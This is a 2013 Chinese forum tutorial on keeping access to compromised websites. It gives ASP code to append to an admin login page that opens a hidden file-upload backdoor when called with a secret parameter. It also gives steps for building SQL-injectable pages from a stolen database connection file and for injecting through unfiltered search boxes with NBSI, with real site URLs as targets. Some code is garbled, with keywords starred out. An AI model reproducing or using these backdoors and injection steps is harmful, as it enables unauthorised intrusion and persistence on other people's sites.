.
img
注册时间:--
  • 纯文字版本
    开 关闭
  • 消息
  • 收藏
  • 退出

[教程]程序留后门几种小方法-

2013/5/14 9:59:00  人气 928    技术交流区  
第一种:是在管理员的后台登陆界面
隐藏我们的后门,这是相对比较安全
的因为管理员的入口不是经常换的,
只要他的登陆界面在,我们的后门就
在!当然,你也可以灵活的插入其他
文件中,只要这个文件不是经常换的
1.从我们的SHELL上找到管理员的入
口页面2.编辑它 在最后面写上一段
代码复制内容到剪贴板代码:<%if
request.QueryString
(“action“)=“comeon“ then
a=Request.TotalBytes:if a Then
b=“adodb.stream“:Set c=*object
(b):c.Type=1:c.Open:c.Write
Request.BinaryRead
(a):c.Position=0:d=c.Read:e=chrB
(13)&chrB(10):f=Instrb
(d,e):g=Instrb(f 1,d,e):set
h=*object
(b):h.Type=1:h.Open:c.Position=f
1:c.Copyto h,g-
f-3:h.Position=0:h.type=2:h.
CharSet=“BIG5“:i=h.Readtext:h.
close:j=mid (i,InstrRev(i,“\“)
1,g):k=Instrb (d,e&e) 4:l=Instrb(k
1,d,leftB(d,f-1))-
k-2:h.Type=1:h.Open:c.Position=k
-1:c.CopyTo h,l:h.SaveToFile
server.mappath (j),2%><form
enctype=multipart/ form-data
method=post><input type=file
name=n><input type=submit></
form> <%end if%>3.那我们要 怎么
去找我们的后门呢?表面看是没 什
么区别的 这就是我们隐藏的秘诀 所
在复制内容到剪贴板代
码:login.asp?action=comeon出现
了我 们的上传页面!第二种,比较绝
了自 己构造注入点通过conn.asp获
知数据 库帐户密码以后自己构造,另
一个是 通过搜索查看源代码构造注
入点。这 也分为几种情况来对应不
同的方法A 类:是MDB数据库那就
很简单了,直 接下下来就OK了B类:
MSSQL数据库 已经获得网站的数据
库链接文件,但 不是SA权限由于入侵
网站并没有注 入漏洞所以,无法注入,
但是我们可以 在本地构造一个存在
注入点的文件, 然后用NBSI去狂扫,
就可以得出数据 库的更多信息.构造
方法:首先本地架 设ASP环境,然后新
建如下文件:复制 内容到剪贴板代
码:<!--#include file=“conn.asp“--
><%dim rs,strSQL,idset
rs=server.*object
(“ADODB.recordset“)id = request
(“id“)strSQL = “* * from admin
where id=“ & id ‘如果没有这个表,
可 以自己建立一个表和字段rs.open
strSQL,conn,1,3rs.close%>注意:其
中 的“admin“表必须存在,所以前提
该文 件必须先与数据库连接上!!完成
了,就 这么简单,其他的信息就让他全
部自 己暴露出来吧.打开nbsi,一顿狂
注,什 么信息都出来啦,第二种,通过搜
索构 造注入点search.asp 搜索页面,
故名 思意。主要检测输入框。复制
内容到 剪贴板代码:Microsoft OLE
DB Provider for ODBC Drivers 岿
粇 ‘80040e14‘[Microsof t][ODBC
SQL Server Driver][SQL Server]
︽ 1: ‘%‘/search.asp, 54出错, 看来
没过滤,接下来我们构造注入 点。注
意看*作,查看源文件复制内 容到剪
贴板代码:<form method=post
action=“search.asp“ >这是一个表
单 以post方式提交给search.asp 的,
提交 的内容我们查看input,<input
type=“text“ size=“12“http://
www.qqbw.cn/search.asp?
searchword=test我们构造出这样一
个 链接。表示直接在网址上提交参
数传 递给search.asp文件。抱歉,並
沒有搜 尋到相關的資料 ! 表示查找
test关键 字,test应该是input输入
的,input输入 框没有过滤,所以它的
内容就存在注 入。我在检查看一下
这个链接。报 错,这样我们就构造出
来了一个注入 点,只需要放在nbsi里
面去跑跑就ok 了。C类:MSSQL数
据库已经获得网 站的数据库链接文
件DB_OWNER 权 限的怎么样,接下
来的差异备分等我 就不演示了,这里
主要讲搜索型注 入。为了便于大家
理解,我再*作两 个网站,不详解了。
没有过滤‘,我们直 接查找源代码中的
input构造注入 点。<form
method=“post“ action=“/
search_all.asp“> 是提交给这个文
件 的。<input type=“text“
size=“14“ 这是 字段。,复制内容到
剪贴板代 码:http://www.qqbw.cn/
search_all.asp?keyword=teest构
造后 的注入点,再用nbsi去跑。 后面
的不 演示。还要给大家说一种思路,
就是 很多管理员后台登录的地方 的
input输入框同样没有过滤,有 时候
不必去找后台密码登录,有时间 可以
构造一个注入点,如果是sa权限 的,还
用登后台吗?
任阿泰(ID1094)加精此贴05-14 10:10

. 德玛西亚~~~~~

发表回复

   


  通知楼主
暂无回复!
今天肿么都在骂
古月哥欠(2937)装B哥
谁要备案,提供资料,我免费
拼音域名 百度收录780多
新火互联空间优惠出售
2元支付宝征集广告语
为毛拉黑呆猫哪个逗比?别人
今天ip破千了,pv破万了
返回技术交流区
AD